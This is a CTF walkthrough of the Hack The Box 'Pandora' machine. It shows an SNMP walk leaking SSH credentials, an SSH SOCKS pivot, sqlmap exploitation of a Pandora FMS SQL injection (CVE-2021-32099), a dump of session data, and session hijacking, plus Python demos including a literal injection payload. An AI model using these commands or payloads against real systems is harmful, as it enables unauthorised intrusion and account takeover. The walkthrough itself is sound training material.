Pandora HTB Machine Educational Walkthrough
Opening Pandora's Box. Made with Midjourney



Please note that as a learning experiment, some of the explanations in the writeup were written by ChatGPT. In those explanations you will see (Defined by ChatGPT) appended.

Pandora is an Ubuntu Linux box hosting a network monitoring web application called Pandora FMS. We started off on this box by spawning it from the Hack The Box interface. Hack The Box is a Cybersecurity Training platform that makes excellent training content, labs, CTFs (Capture The Flag experiences) and challenges to help anyone upskill.



External Enumeration

We started our external enumeration of the target with nmap: default scripts (-sC), version detection (-sV) and no host discovery (-Pn), since Hack The Box machines often do not answer ping.

sudo nmap -sC -sV -Pn 10.10.11.136

Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 03:30 GMT
Nmap scan report for 10.10.11.136
Host is up (0.100s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

We discovered SSH (22) and HTTP (80) running on the target. SSH (Secure Shell) gives remote access to the command line over an encrypted channel; the OpenSSH 8.2p1 4ubuntu0.3 banner, together with Apache 2.4.41, identifies the host as Ubuntu 20.04. HTTP (Hypertext Transfer Protocol) on port 80 means the target is serving a website. The page title "Play | Landing" is a plain landing page rather than the monitoring console the box name suggests, a hint that there is more to find.

UDP Enumeration

Our first scan only covered TCP. nmap scans UDP with the -sU option; this is slow, because a closed UDP port is only inferred from an ICMP port-unreachable reply and an open one often does not answer at all (hence the many open|filtered results below). The output below also includes the REASON and VERSION columns, which nmap only prints when --reason and -sV are given.

sudo nmap -sU 10.10.11.136

PORT      STATE         SERVICE         REASON              VERSION
7/udp     closed        echo            port-unreach ttl 63
9/udp     closed        discard         port-unreach ttl 63
17/udp    open|filtered qotd            no-response
19/udp    closed        chargen         port-unreach ttl 63
49/udp    open|filtered tcpwrapped      no-response
53/udp    open|filtered domain          no-response
67/udp    open|filtered tcpwrapped      no-response
68/udp    closed        dhcpc           port-unreach ttl 63
69/udp    open|filtered tftp            no-response
80/udp    closed        http            port-unreach ttl 63
88/udp    closed        kerberos-sec    port-unreach ttl 63
111/udp   open|filtered rpcbind         no-response
120/udp   closed        cfdptkt         port-unreach ttl 63
123/udp   open|filtered ntp             no-response
135/udp   open|filtered msrpc           no-response
136/udp   closed        profile         port-unreach ttl 63
137/udp   closed        netbios-ns      port-unreach ttl 63
138/udp   open|filtered tcpwrapped      no-response
139/udp   closed        netbios-ssn     port-unreach ttl 63
158/udp   closed        pcmail-srv      port-unreach ttl 63
161/udp   open          snmp            udp-response ttl 63 SNMPv1 server (public)
162/udp   open|filtered tcpwrapped      no-response
177/udp   open|filtered xdmcp           no-response
427/udp   closed        svrloc          port-unreach ttl 63
443/udp   open|filtered https           no-response
445/udp   closed        microsoft-ds    port-unreach ttl 63
497/udp   closed        retrospect      port-unreach ttl 63
500/udp   closed        isakmp          port-unreach ttl 63
514/udp   open|filtered tcpwrapped      no-response
515/udp   open|filtered tcpwrapped      no-response
518/udp   closed        ntalk           port-unreach ttl 63
520/udp   closed        route           port-unreach ttl 63
593/udp   open|filtered tcpwrapped      no-response
623/udp   open|filtered asf-rmcp        no-response
626/udp   closed        serialnumberd   port-unreach ttl 63
631/udp   open|filtered tcpwrapped      no-response
996/udp   open|filtered tcpwrapped      no-response
997/udp   closed        maitrd          port-unreach ttl 63
998/udp   open|filtered tcpwrapped      no-response
999/udp   closed        applix          port-unreach ttl 63
1022/udp  closed        exp2            port-unreach ttl 63
1023/udp  closed        unknown         port-unreach ttl 63
1025/udp  closed        blackjack       port-unreach ttl 63
1026/udp  closed        win-rpc         port-unreach ttl 63
1027/udp  closed        unknown         port-unreach ttl 63
1028/udp  open|filtered tcpwrapped      no-response
1029/udp  closed        solid-mux       port-unreach ttl 63
1030/udp  open|filtered tcpwrapped      no-response
1433/udp  closed        ms-sql-s        port-unreach ttl 63
1434/udp  open|filtered ms-sql-m        no-response
1645/udp  closed        radius          port-unreach ttl 63
1646/udp  open|filtered tcpwrapped      no-response
1701/udp  closed        L2TP            port-unreach ttl 63
1718/udp  closed        h225gatedisc    port-unreach ttl 63
1719/udp  closed        h323gatestat    port-unreach ttl 63
1812/udp  open|filtered tcpwrapped      no-response
1813/udp  open|filtered tcpwrapped      no-response
1900/udp  closed        upnp            port-unreach ttl 63
2000/udp  closed        cisco-sccp      port-unreach ttl 63
2048/udp  closed        dls-monitor     port-unreach ttl 63
2049/udp  closed        nfs             port-unreach ttl 63
2222/udp  closed        msantipiracy    port-unreach ttl 63
2223/udp  closed        rockwell-csp2   port-unreach ttl 63
3283/udp  closed        netassistant    port-unreach ttl 63
3456/udp  open|filtered tcpwrapped      no-response
3703/udp  open|filtered tcpwrapped      no-response
4444/udp  closed        krb524          port-unreach ttl 63
4500/udp  closed        nat-t-ike       port-unreach ttl 63
5000/udp  open|filtered tcpwrapped      no-response
5060/udp  open|filtered sip             no-response
5353/udp  closed        zeroconf        port-unreach ttl 63
5632/udp  open|filtered pcanywherestat  no-response
9200/udp  closed        wap-wsp         port-unreach ttl 63
10000/udp closed        ndmp            port-unreach ttl 63
17185/udp open|filtered tcpwrapped      no-response
20031/udp open|filtered tcpwrapped      no-response
30718/udp closed        unknown         port-unreach ttl 63
31337/udp open|filtered BackOrifice     no-response
32768/udp open|filtered omad            no-response
32769/udp closed        filenet-rpc     port-unreach ttl 63
32771/udp closed        sometimes-rpc6  port-unreach ttl 63
32815/udp closed        unknown         port-unreach ttl 63
33281/udp closed        unknown         port-unreach ttl 63
49152/udp closed        unknown         port-unreach ttl 63
49153/udp closed        unknown         port-unreach ttl 63
49154/udp closed        unknown         port-unreach ttl 63
49156/udp open|filtered unknown         no-response
49181/udp closed        unknown         port-unreach ttl 63
49182/udp closed        unknown         port-unreach ttl 63
49185/udp closed        unknown         port-unreach ttl 63
49186/udp closed        unknown         port-unreach ttl 63
49188/udp open|filtered tcpwrapped      no-response
49190/udp open|filtered tcpwrapped      no-response
49191/udp closed        unknown         port-unreach ttl 63
49192/udp open|filtered tcpwrapped      no-response
49193/udp open|filtered tcpwrapped      no-response
49194/udp open|filtered tcpwrapped      no-response
49200/udp closed        unknown         port-unreach ttl 63
49201/udp closed        unknown         port-unreach ttl 63
65024/udp closed        unknown         port-unreach ttl 63

SNMP (Simple Network Management Protocol) lets a management station query and monitor network devices and servers (switches, routers, hosts and so on). The interesting part is the detail nmap added to port 161: the agent answered an SNMPv1 request for the community string public. SNMPv1 and v2c have no authentication beyond that string, it travels in cleartext, and public is the read-only default on many agents, so anyone who can reach the port can read everything the agent exposes. We decided to enumerate it.

SNMP Gives Us Creds

We found credentials using snmpwalk. An SNMP walk issues GETNEXT requests in a loop to enumerate every object under a branch of the device's management information base (MIB), which is useful for collecting the device's configuration and performance data. The branch that matters here is the hrSWRunTable from HOST-RESOURCES-MIB (1.3.6.1.2.1.25.4.2), whose hrSWRunParameters column (1.3.6.1.2.1.25.4.2.1.5) holds the command-line arguments of every running process; any secret that a program is started with as an argument is therefore readable by anyone who knows the community string. Walking only that subtree is much faster than a full walk. Snmpwalk is the tool we used to do this.

snmpwalk -v2c 10.10.11.136 -c public
 
<SNIP>
iso.3.6.1.2.1.25.4.2.1.5.960 = ""
iso.3.6.1.2.1.25.4.2.1.5.1037 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1039 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1040 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1041 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1131 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1135 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1150 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1199 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1200 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1201 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1288 = ""
         

We were able to use the discovered credentials (daniel:HotelBabylon23) to log in to the target over SSH. Credential reuse between an application service account and a system account is the real weakness here; the SNMP community string just made it visible.
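Picking one credential out of a full walk by eye is unreliable. The script below is an added example, not part of the original post: it parses snmpwalk's numeric output for the hrSWRunTable, joins the hrSWRunName and hrSWRunParameters columns by PID, and flags command lines that look like they carry a password. The embedded sample walk is constructed to mirror the output above; only PID 1131's argument string is taken from the real walk, the process names are made up.

```python
import re
import sys
from typing import Dict, Iterable, List, Tuple

# HOST-RESOURCES-MIB hrSWRunTable rows look like
#   iso.3.6.1.2.1.25.4.2.1.<column>.<pid> = STRING: "<value>"
# column 2 = hrSWRunName, 4 = hrSWRunPath, 5 = hrSWRunParameters.
# snmpwalk prints this numeric "iso." form when no MIB files are installed,
# which is what the walk above shows.
ROW = re.compile(
    r'^(?:iso|\.1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.(?P<col>[245])\.(?P<pid>\d+)'
    r'\s*=\s*(?:STRING:\s*)?"?(?P<val>.*?)"?\s*$'
)
COLUMNS = {"2": "name", "4": "path", "5": "params"}

# Heuristic: switches and KEY=VALUE pairs that usually carry a secret.
# "-p" is also a port flag for some tools, so treat hits as leads, not proof.
SECRET_HINT = re.compile(
    r'(?:^|\s)(?:-p\s*\S|--pass(?:word)?[= ]\S)|(?:pass(?:word)?|pwd|secret|token)=\S',
    re.I,
)


def parse_hrswrun(lines: Iterable[str]) -> Dict[int, Dict[str, str]]:
    """Group hrSWRunName/Path/Parameters rows by PID."""
    procs: Dict[int, Dict[str, str]] = {}
    for line in lines:
        m = ROW.match(line.strip())
        if not m:
            continue
        entry = procs.setdefault(int(m.group("pid")), {"name": "", "path": "", "params": ""})
        entry[COLUMNS[m.group("col")]] = m.group("val")
    return procs


def find_secret_args(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (pid, process name, argument string) for every process whose
    command line looks like it contains a credential."""
    hits = []
    for pid, proc in sorted(parse_hrswrun(lines).items()):
        if proc["params"] and SECRET_HINT.search(proc["params"]):
            hits.append((pid, proc["name"] or proc["path"], proc["params"]))
    return hits


# Constructed sample modelled on the walk above (process names are made up).
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.1037 = STRING: "apache2"
iso.3.6.1.2.1.25.4.2.1.2.1131 = STRING: "host_check"
iso.3.6.1.2.1.25.4.2.1.2.1135 = STRING: "apache2"
iso.3.6.1.2.1.25.4.2.1.5.960 = ""
iso.3.6.1.2.1.25.4.2.1.5.1037 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1131 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1135 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1288 = ""
"""

if __name__ == "__main__":
    # Usage: snmpwalk -v2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1 | python3 snmp_creds.py
    # With no piped input the constructed sample is used instead.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_WALK.splitlines()
    for pid, name, params in find_secret_args(source):
        print(f"pid {pid} ({name}): {params}")
```

The same idea works defensively: run it against your own agents, and move any flagged secret into a config file or environment read by the process rather than its argv, since argv is world-readable in /proc as well as over SNMP.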

ssh daniel@10.10.11.136
 
daniel@pandora:~$         

Once we got access we began internal host enumeration.

Internal Host Enumeration (Linux Privilege Escalation)

After running manual enumeration (searching through files, sudo -l, etc.) and LinPEAS (thanks again Carlos), we found an Apache2 configuration file, pandora.conf, for a second website hosted on the box. It is an Apache virtual host (vhost), enabled through a symlink in sites-enabled, and as the address on the VirtualHost line shows it is only reachable on the target's loopback interface. Here is the LinPEAS hit and the file:

lrwxrwxrwx 1 root root 31 Dec 3 2021 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf

<VirtualHost localhost:80>
 ServerAdmin [email protected]
 ServerName pandora.panda.htb
 DocumentRoot /var/www/pandora
 AssignUserID matt matt
 <Directory /var/www/pandora>
  AllowOverride All
 </Directory>
 ErrorLog /var/log/apache2/error.log
 CustomLog /var/log/apache2/access.log combined
</VirtualHost>

Here is an explanation of the pandora.conf file, directive by directive:

  1. The lrwxrwxrwx line from the LinPEAS output shows that /etc/apache2/sites-enabled/pandora.conf is a symbolic link to ../sites-available/pandora.conf. Debian-style Apache only loads the vhosts linked into sites-enabled, so this site is active.
  2. <VirtualHost localhost:80>: opens a virtual host block that only matches connections arriving on the localhost address on port 80. A request to the box's external IP is handled by a different vhost (the "Play | Landing" site nmap saw), which is why this site is invisible from outside without a tunnel.
  3. ServerAdmin: the administrator contact address shown on server-generated error pages.
  4. ServerName pandora.panda.htb: the hostname this vhost answers to; with name-based hosting Apache compares it against the Host header of each request.
  5. DocumentRoot /var/www/pandora: the directory from which this site's files are served.
  6. AssignUserID matt matt: not a core Apache directive but one from the mpm-itk module. The itk MPM forks a worker per request and switches it to the given user and group, so PHP code under this vhost runs as matt instead of www-data, and any file it writes is owned by matt.
  7. <Directory /var/www/pandora> ... </Directory>: scopes the enclosed settings to that directory tree.
  8. AllowOverride All: lets .htaccess files in that tree override almost any server setting. This is convenient for the application, but it means anyone who can write into the web root can change how Apache treats it.
  9. ErrorLog /var/log/apache2/error.log: where errors for this vhost are written.
  10. CustomLog /var/log/apache2/access.log combined: the access log, in the Combined Log Format (the Common Log Format fields plus the Referer and User-Agent headers). It records requests only; error data goes to the ErrorLog.

The ServerName gives us a hostname, pandora.panda.htb, so we added it to /etc/hosts on the attack host. On its own this does not get us to the site: the vhost only matches connections to localhost:80 on the target, so a request to 10.10.11.136 still lands on the landing page. We need to reach the target's loopback interface through the tunnel set up next (through which plain http://127.0.0.1 works as well).

10.10.11.136 pandora.panda.htb        

Setting up the Pivot/Proxy

ssh -D 9050 daniel@10.10.11.136

daniel@10.10.11.136's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information as of Tue 6 Dec 04:41:48 UTC 2022

 System load:           0.0
 Usage of /:            63.0% of 4.87GB
 Memory usage:          14%
 Swap usage:            0%
 Processes:             233
 Users logged in:       0
 IPv4 address for eth0: 10.10.11.136
 IPv6 address for eth0: dead:beef::250:56ff:feb9:cf72

 => /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Dec 6 04:15:13 2022 from 10.10.14.16
daniel@pandora:~$

The command ssh -D 9050 daniel@10.10.11.136 logs in as daniel and, because of -D, makes the SSH client listen on local port 9050 as a SOCKS proxy (dynamic port forwarding). Every connection sent to that proxy is carried through the encrypted SSH session and opened from the target's side, so a request for 127.0.0.1:80 through the proxy reaches the Apache instance on the box's loopback interface, which is exactly where the pandora vhost lives and which is unreachable from the attack host directly.

We then point our tools at the proxy: proxychains for sqlmap (its default configuration already uses a SOCKS proxy on 127.0.0.1:9050, which is why that port was chosen), and a browser proxy extension such as FoxyProxy for manual work. Two practical notes: use SOCKS5 with remote DNS resolution (FoxyProxy's proxy DNS option, or proxy_dns in proxychains) if you want to rely on the pandora.panda.htb hostname rather than 127.0.0.1, and remember that everything you send through the tunnel is logged in the target's Apache access log like any other local request.



Logging in to the console with daniel's credentials does not get us in; the login page returns an error message instead. So daniel's account is not enough on its own and we need another way to a usable session.


We then attempted to exploit the SQL injection vulnerability described in SonarSource's blog post on Pandora FMS 742 (CVE-2021-32099: an unauthenticated SQL injection in the session_id parameter of include/chart_generator.php) using sqlmap.

Database Enumeration

proxychains wraps the sqlmap process so that every TCP connection it opens is sent through the SOCKS proxy on 127.0.0.1:9050, i.e. through the SSH tunnel. That is what the S-chain lines in the output show: 127.0.0.1:9050 (the local SOCKS listener) followed by 127.0.0.1:80 (the destination, opened from the target's side). Note that the destination is port 80, plain HTTP on the target's loopback interface, which is the only place the pandora vhost listens; the commands below therefore use http://127.0.0.1.

sqlmap detects and exploits SQL injection in web applications. --url gives it chart_generator.php with the session_id parameter as the injection point, and --current-db asks it to retrieve the name of the database the application is connected to. sqlmap reports the injection as boolean-based (see the OR boolean-based warning), meaning it infers data one true/false answer at a time from differences in the response; this works but is slow and noisy, and every probe appears in the Apache access log for the vhost. As with everything in this writeup, only run this against systems you have permission to test.

proxychains sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --current-db

S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
[05:36:01] [INFO] heuristic (basic) test shows that GET parameter 'session_id' might be injectable (possible DBMS: 'MySQL')
S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
[05:36:01] [INFO] heuristic (XSS) test shows that GET parameter 'session_id' might be vulnerable to cross-site scripting (XSS) attacks
[05:36:01] [INFO] testing for SQL injection on GET parameter 'session_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
[05:37:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
GET parameter 'session_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:41:18] [INFO] fetching current database
S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
[05:41:18] [WARNING] reflective value(s) found and filtering out
[05:41:18] [INFO] retrieved: 'pandora'
current database: 'pandora'
[05:41:18] [INFO] fetched data logged to text files under '/home/htb-ltnbob/.local/share/sqlmap/output/127.0.0.1'

With the database name known, we listed its tables:

proxychains sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables
 
Database: pandora
[178 tables]
+------------------------------------+
| taddress                           |
| taddress_agent                     |
| tagent_access                      |
| tagent_custom_data                 |
| tagent_custom_fields               |
| tagent_custom_fields_filter        |
| tagent_module_inventory            |
| tagent_module_log                  |
| tagent_repository                  |
| tagent_secondary_group             |
| tagente                            |
| tagente_datos                      |
| tagente_datos_inc                  |
| tagente_datos_inventory            |
| tagente_datos_log4x                |
| tagente_datos_string               |
| tagente_estado                     |
| tagente_modulo                     |
| talert_actions                     |
| talert_commands                    |
| talert_snmp                        |
| talert_snmp_action                 |
| talert_special_days                |
| talert_template_module_actions     |
| talert_template_modules            |
| talert_templates                   |
| tattachment                        |
| tautoconfig                        |
| tautoconfig_actions                |
| tautoconfig_rules                  |
| tcategory                          |
| tcluster                           |
| tcluster_agent                     |
| tcluster_item                      |
| tcollection                        |
| tconfig                            |
| tconfig_os                         |
| tcontainer                         |
| tcontainer_item                    |
| tcredential_store                  |
| tdashboard                         |
| tdatabase                          |
| tdeployment_hosts                  |
| tevent_alert                       |
| tevent_alert_action                |
| tevent_custom_field                |
| tevent_extended                    |
| tevent_filter                      |
| tevent_response                    |
| tevent_rule                        |
| tevento                            |
| textension_translate_string        |
| tfiles_repo                        |
| tfiles_repo_group                  |
| tgis_data_history                  |
| tgis_data_status                   |
| tgis_map                           |
| tgis_map_connection                |
| tgis_map_has_tgis_map_con          |
| tgis_map_layer                     |
| tgis_map_layer_groups              |
| tgis_map_layer_has_tagente         |
| tgraph                             |
| tgraph_source                      |
| tgraph_source_template             |
| tgraph_template                    |
| tgroup_stat                        |
| tgrupo                             |
| tincidencia                        |
| titem                              |
| tlanguage                          |
| tlayout                            |
| tlayout_data                       |
| tlayout_template                   |
| tlayout_template_data              |
| tlink                              |
| tlocal_component                   |
| tlog_graph_models                  |
| tmap                               |
| tmensajes                          |
| tmetaconsole_agent                 |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event                 |
| tmetaconsole_event_history         |
| tmetaconsole_setup                 |
| tmigration_module_queue            |
| tmigration_queue                   |
| tmodule                            |
| tmodule_group                      |
| tmodule_inventory                  |
| tmodule_relationship               |
| tmodule_synth                      |
| tnetflow_filter                    |
| tnetflow_report                    |
| tnetflow_report_content            |
| tnetwork_component                 |
| tnetwork_component_group           |
| tnetwork_map                       |
| tnetwork_matrix                    |
| tnetwork_profile                   |
| tnetwork_profile_component         |
| tnetworkmap_ent_rel_nodes          |
| tnetworkmap_enterprise             |
| tnetworkmap_enterprise_nodes       |
| tnews                              |
| tnota                              |
| tnotification_group                |
| tnotification_source               |
| tnotification_source_group         |
| tnotification_source_group_user    |
| tnotification_source_user          |
| tnotification_user                 |
| torigen                            |
| tpassword_history                  |
| tperfil                            |
| tphase                             |
| tplanned_downtime                  |
| tplanned_downtime_agents           |
| tplanned_downtime_modules          |
| tplugin                            |
| tpolicies                          |
| tpolicy_agents                     |
| tpolicy_alerts                     |
| tpolicy_alerts_actions             |
| tpolicy_collections                |
| tpolicy_groups                     |
| tpolicy_modules                    |
| tpolicy_modules_inventory          |
| tpolicy_plugins                    |
| tpolicy_queue                      |
| tprofile_view                      |
| tprovisioning                      |
| tprovisioning_rules                |
| trecon_script                      |
| trecon_task                        |
| trel_item                          |
| tremote_command                    |
| tremote_command_target             |
| treport                            |
| treport_content                    |
| treport_content_item               |
| treport_content_item_temp          |
| treport_content_sla_com_temp       |
| treport_content_sla_combined       |
| treport_content_template           |
| treport_custom_sql                 |
| treport_template                   |
| treset_pass                        |
| treset_pass_history                |
| tserver                            |
| tserver_export                     |
| tserver_export_data                |
| tservice                           |
| tservice_element                   |
| tsesion                            |
| tsesion_extended                   |
| tsessions_php                      |
| tskin                              |
| tsnmp_filter                       |
| ttag                               |
| ttag_module                        |
| ttag_policy_module                 |
| ttipo_modulo                       |
| ttransaction                       |
| ttrap                              |
| ttrap_custom_values                |
| tupdate                            |
| tupdate_journal                    |
| tupdate_package                    |
| tupdate_settings                   |
| tuser_double_auth                  |
| tuser_task                         |
| tuser_task_scheduled               |
| tusuario                           |
| tusuario_perfil                    |
| tvisual_console_elements_cache     |
| twidget                            |
| twidget_dashboard                  |
+------------------------------------+
tsessions_php is where the console stores PHP session data, so we dumped it looking for a live session belonging to a more privileged user than daniel:

proxychains sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
 
Database: pandora
Table: tsessions_php
[46 entries]
+----------------------------+-----------------------------------------------------+-------------+
| id_session                 | data                                                | last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                            | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                | 1638789018  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                | 1638786129  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                            | 1638540332  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                | 1638795380  |
| 3o0ft0hh97f63a0ccuagddbgv9 | NULL                                                | 1670305367  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                | 1638786842  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                            | 1638535373  |
| 59qae699l0971h13qmbpqahlls | NULL                                                | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                | 1638792685  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                            | 1638281946  |
| 5mkjqefvqsv329mdujt4n6oll2 | id_usuario|s:6:"daniel";                            | 1670305086  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                            | 1641195617  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                            | 1638446321  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                | 1638787267  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                            | 1638881787  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                            | 1638881664  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                | 1638786277  |
| ebplbdaru16u2a2e449h2akhmc | NULL                                                | 1670302254  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                | 1638540345  |
| hr4mas6qis9bv434h89pr2lho9 | id_usuario|s:6:"daniel";                            | 1670297215  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                            | 1638168492  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                            | 1638456173  |
| kkkvfd4sgalbjracetjdeik0v7 | NULL                                                | 1670305476  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                | 1638787808  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                            | 1638540482  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                            | 1637667827  |
| or55gnvv41ck6tb9j63oq01l0q | NULL                                                | 1670304499  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                            | 1638168416  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                            | 1638889082  |
| ruo2v3o9bg97aitn231g5e7scc | NULL                                                | 1670305279  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                            | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                            | 1638793297  |
+----------------------------+-----------------------------------------------------+-------------+

One row stands out: the session for matt (id_usuario|s:4:"matt"), the only user other than daniel. chart_generator.php starts a PHP session with whatever session_id it is given, and the console hands that id back to the browser as the PHPSESSID cookie (it is visible in the Burp request further down), so requesting the page with matt's id and then loading the main console page leaves us authenticated as matt:

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=g4e01qdgk36mfdh90hvcc54umq
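sqlmap automated the whole chain above. The following Python example is added here and is not from the post or from Pandora FMS's source: it recreates the class of bug on an in-memory SQLite copy of tsessions_php so both halves can be seen by hand. A vulnerable lookup splices session_id into the query, a crafted value makes it return matt's row instead of our own, and the boolean-based oracle sqlmap reported recovers matt's session id one character at a time. The table shape and rows mirror the dump above; the lookup functions are a constructed stand-in for the real code.

```python
import re
import sqlite3
from typing import Optional

# Constructed stand-in for Pandora's tsessions_php table. The rows copy the
# three shapes in the dump above (a daniel session, an anonymous session and
# matt's session); the lookup code below is not Pandora's source.
ROWS = [
    ("09vao3q1dikuoi1vhcvhcjjbc6", 'id_usuario|s:6:"daniel";', 1638783555),
    ("0ahul7feb1l9db7ffp8d25sjba", None, 1638789018),
    ("g4e01qdgk36mfdh90hvcc54umq",
     'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;', 1638796349),
]
# PHP session ids use [0-9a-v] by default; a slightly wider set costs little.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tsessions_php "
               "(id_session TEXT PRIMARY KEY, data TEXT, last_active INTEGER)")
    db.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", ROWS)
    return db


def load_session_vulnerable(db: sqlite3.Connection, session_id: str) -> Optional[str]:
    """The bug class: the request parameter is spliced into the SQL text."""
    sql = f"SELECT data FROM tsessions_php WHERE id_session = '{session_id}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def load_session_fixed(db: sqlite3.Connection, session_id: str) -> Optional[str]:
    """The fix: a bound parameter is always data, never SQL."""
    row = db.execute("SELECT data FROM tsessions_php WHERE id_session = ?",
                     (session_id,)).fetchone()
    return row[0] if row else None


def user_from_session(data: Optional[str]) -> Optional[str]:
    """Pull id_usuario out of PHP's serialised session data."""
    m = re.search(r'id_usuario\|s:\d+:"([^"]*)";', data or "")
    return m.group(1) if m else None


# Direct takeover: make the WHERE clause true for matt's row rather than ours.
# The application then treats the loaded session as the caller's own.
TAKEOVER = "' OR data LIKE '%\"matt\"%' -- "


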